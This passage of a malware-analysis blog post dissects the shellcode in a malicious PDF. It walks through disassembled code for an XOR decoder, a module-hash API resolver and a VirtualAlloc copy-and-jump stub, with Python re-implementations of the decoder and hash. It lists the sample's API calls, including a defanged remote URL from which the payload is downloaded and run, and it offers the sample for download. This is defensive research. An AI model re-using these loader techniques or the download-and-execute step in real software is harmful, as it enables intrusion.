0x40fff3L | push esi | 1 | 4 |
0x40fff4L | cmp byte [esi],0x5e | 1 | 5 |
0x40fff7L | jz 0x40ffff | 1 | 6 |
0x40fff9L | lodsb | 905 | 3623 |
0x40fffaL | xor al,0xdc | 905 | 3624 |
0x40fffcL | stosb | 905 | 3625 |
0x40fffdL | loop 0x40fff9 | 905 | 3626 |
0x40ffffL | ret | 1 | 3627 |
0x410000 | call 0x40ffe9 | 1 | 0 |
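The loop in the listing above is a single-byte XOR decoder: it XORs 0x389 (905) bytes in place with 0xdc, and skips the loop when the first byte is already 0x5e. A rough Python equivalent follows; xor_decode is a hypothetical helper, and the three sample bytes appear to be the ones that follow the call instruction in the decoded blob (the base64 group glGq).

```python
def xor_decode(buf, key=0xDC, length=0x389, marker=0x5E):
    """Mirror the decoder loop: XOR `length` bytes with `key` unless already decoded."""
    data = bytearray(buf)
    if data and data[0] == marker:           # cmp byte [esi],0x5e / jz: skip the loop
        return bytes(data)
    for i in range(min(length, len(data))):  # loop executes ecx = 0x389 times
        data[i] ^= key                       # lodsb / xor al,0xdc / stosb
    return bytes(data)

# Bytes that appear right after the call in the decoded blob (assumption, see above).
encoded = bytes.fromhex("8251aa")
print(xor_decode(encoded).hex())  # 5e8d76
```

The first decoded byte is 0x5e, which matches the marker the stub tests for before decoding.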
ADDRESS | DISASSEMBLY | COUNT | EXE COUNT |
---|---|---|---|
0x410256L | pusha | 1 | 3635 |
0x410257L | xor eax,eax | 1 | 3636 |
0x410259L | mov edx,fs:[eax+0x30] | 1 | 3637 |
0x41025dL | mov edx,[edx+0xc] | 1 | 3638 |
0x410260L | mov edx,[edx+0x14] | 1 | 3639 |
0x410263L | mov esi,[edx+0x28] | 2 | 3749 |
0x410266L | xor edi,edi | 2 | 3750 |
0x410268L | xor eax,eax | 23 | 3880 |
0x41026aL | lodsb | 23 | 3881 |
0x41026bL | inc esi | 23 | 3882 |
0x41026cL | test eax,eax | 23 | 3883 |
0x41026eL | jz 0x41027d | 23 | 3884 |
0x410270L | cmp al,0x61 | 21 | 3874 |
0x410272L | jl 0x410276 | 21 | 3875 |
0x410274L | sub al,0x20 | 17 | 3876 |
0x410276L | ror edi,0xd | 21 | 3877 |
0x410279L | add edi,eax | 21 | 3878 |
0x41027bL | jmp 0x410268 | 21 | 3879 |
0x41027dL | cmp edi,[esp+0x24] | 2 | 3885 |
0x410281L | mov eax,[edx+0x10] | 2 | 3886 |
0x410284L | mov edx,[edx] | 2 | 3887 |
0x410286L | jnz 0x410263 | 2 | 3888 |
0x410288L | mov [esp+0x1c],eax | 1 | 3889 |
0x41028cL | popa | 1 | 3890 |
0x41028dL | retn 0x4 | 1 | 3891 |
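The listing above has the shape of a common shellcode idiom: walk the list of loaded modules, hash each module name, and compare the hash with a value passed on the stack. The inner loop upper-cases each character, rotates the running hash right by 13 bits, and adds the character. The sketch below reproduces only that hash; module_hash and ror32 are illustrative names, and the ASCII-only input is an assumption.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by `count` bits."""
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def module_hash(name):
    """Hash a module name the way the loop above does (assumes ASCII input)."""
    h = 0
    for ch in name.encode("ascii"):
        if ch >= 0x61:              # cmp al,0x61 / jl: skip for bytes below 'a'
            ch -= 0x20              # sub al,0x20: fold lower case to upper case
        h = (ror32(h, 13) + ch) & 0xFFFFFFFF  # ror edi,0xd / add edi,eax
    return h

print(hex(module_hash("AB")))       # 0x2080042
print(module_hash("kernel32.dll") == module_hash("KERNEL32.DLL"))  # True
```

Because of the case folding, the shellcode can match a module regardless of how its name is capitalised in memory.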
ADDRESS | DISASSEMBLY | COUNT | EXE COUNT |
---|---|---|---|
0x410172 | push byte 0x40 | 1 | 4700 |
0x410174L | push dword 0x1000 | 1 | 4701 |
0x410179L | push byte 0x1 | 1 | 4702 |
0x41017bL | push byte 0x0 | 1 | 4703 |
0x41017dL | call eax | 1 | 4704 |
kernel32.VirtualAlloc(lpAddress=0x0, dwSize=0x1, flAllocationType=0x1000, flProtect=0x40)
Interestingly, only one byte is requested. However, since lpAddress is set to null, it gets all the space allocated up to the next page boundary. The shellcode relies on this, since it then copies 0x375 bytes into that newly allocated space and then jumps into it.
ADDRESS | DISASSEMBLY | COUNT | EXE COUNT |
---|---|---|---|
0x41000e | mov ecx,0x375 | 1 | 4712 |
0x410013L | mov edi,eax | 1 | 4713 |
0x410015L | rep movsb | 1 | 4714 |
0x410017L | jmp eax | 1 | 4715 |
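The arithmetic behind that one-byte request is worth spelling out. The sketch below assumes 4 KiB pages, the usual size on x86 Windows; round_up_to_page is a hypothetical helper.

```python
PAGE_SIZE = 0x1000  # assumption: 4 KiB pages

def round_up_to_page(size, page_size=PAGE_SIZE):
    """Round an allocation size up to the next page boundary."""
    return (size + page_size - 1) // page_size * page_size

allocated = round_up_to_page(0x1)   # dwSize=0x1 from the VirtualAlloc call
print(hex(allocated))               # 0x1000
print(0x375 <= allocated)           # True: the 0x375-byte copy fits
```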
ADDRESS | DISASSEMBLY | COUNT | EXE COUNT |
---|---|---|---|
0xf000003f | call eax | 1 | 12078 |
0x410017L | cmp al,0x6 | 1 | 12085 |
The shellcode checks the major version of the OS. Microsoft documents these version numbers. The short story is that 6 is Windows Vista and later, and 5 is Windows XP and earlier. For Windows Vista and later, the shellcode finds advapi32 and shell32 through the process’s loaded modules, not by using LoadLibraryA. In all, the DLL calls made are:
kernel32.VirtualAlloc()
kernel32.VirtualAlloc()
ntdll.swprintf()
kernel32.LoadLibraryA(lpFileName=urlmon)
urlmon.URLDownloadToCacheFileW(szUrl=hxxp://zzrnneaejhi[.]ddns[.]name/b6noxa1/?23ed7cc71ce4e972574b005f0558510201075d5f0301530c070257520e5b5a07;1;3)
kernel32.GetVersion()
advapi32.OpenProcessToken()
shell32.ShellExecuteExW()
kernel32.LoadLibraryA(lpFileName=urlmon)
urlmon.URLDownloadToCacheFileW(szUrl=hxxp://zzrnneaejhi[.]ddns[.]name/b6noxa1/?23ed7cc71ce4e972574b005f0558510201075d5f0301530c070257520e5b5a07;1;3)
ntdll.NtTerminateThread()
For Windows XP and earlier, the net result is the same; only the DLL functions called differ.
kernel32.VirtualAlloc()
kernel32.VirtualAlloc()
ntdll.swprintf()
kernel32.LoadLibraryA(lpFileName=urlmon)
urlmon.URLDownloadToCacheFileW(szUrl=hxxp://zzrnneaejhi[.]ddns[.]name/b6noxa1/?23ed7cc71ce4e972574b005f0558510201075d5f0301530c070257520e5b5a07;1;3)
kernel32.GetVersion()
kernel32.CreateProcessW()
kernel32.LoadLibraryA(lpFileName=urlmon)
urlmon.URLDownloadToCacheFileW(szUrl=hxxp://zzrnneaejhi[.]ddns[.]name/b6noxa1/?23ed7cc71ce4e972574b005f0558510201075d5f0301530c070257520e5b5a07;1;3)
ntdll.NtTerminateThread()
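The only difference between the two call lists is how the downloaded file is launched. A compact way to picture the branch is below. GetVersion does return the major version in the low-order byte, but launch_api is a hypothetical helper, the two sample return values are illustrative, and treating "6 or higher" as the Vista path is an assumption, since the listing shows only the cmp al,0x6 and not the jump that follows.

```python
def major_version(get_version_result):
    """GetVersion returns the OS major version in the low-order byte."""
    return get_version_result & 0xFF

def launch_api(get_version_result):
    """Pick the launch call seen in the traces above for a GetVersion result."""
    # Mirrors "cmp al,0x6"; the >= comparison is an assumption.
    if major_version(get_version_result) >= 6:
        return "shell32.ShellExecuteExW"
    return "kernel32.CreateProcessW"

# Illustrative return values: version 5.1 and version 6.1.
print(launch_api(0x0A280105))  # kernel32.CreateProcessW
print(launch_api(0x1DB10106))  # shell32.ShellExecuteExW
```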
This analysis was possible because of the changes we made in pdf.py in jsunpack. We added support for detecting XFA objects and then parsing the XML data to extract the JavaScript and the rawValue data associated with it. Again, these modifications have been shared back to the jsunpack project.
Post written by David Dorsey of Visiblerisk, Inc.
We’ve had a couple of requests for the PDF sample. It can be found here. The password for the zip file is “infected”; remember, it’s malware.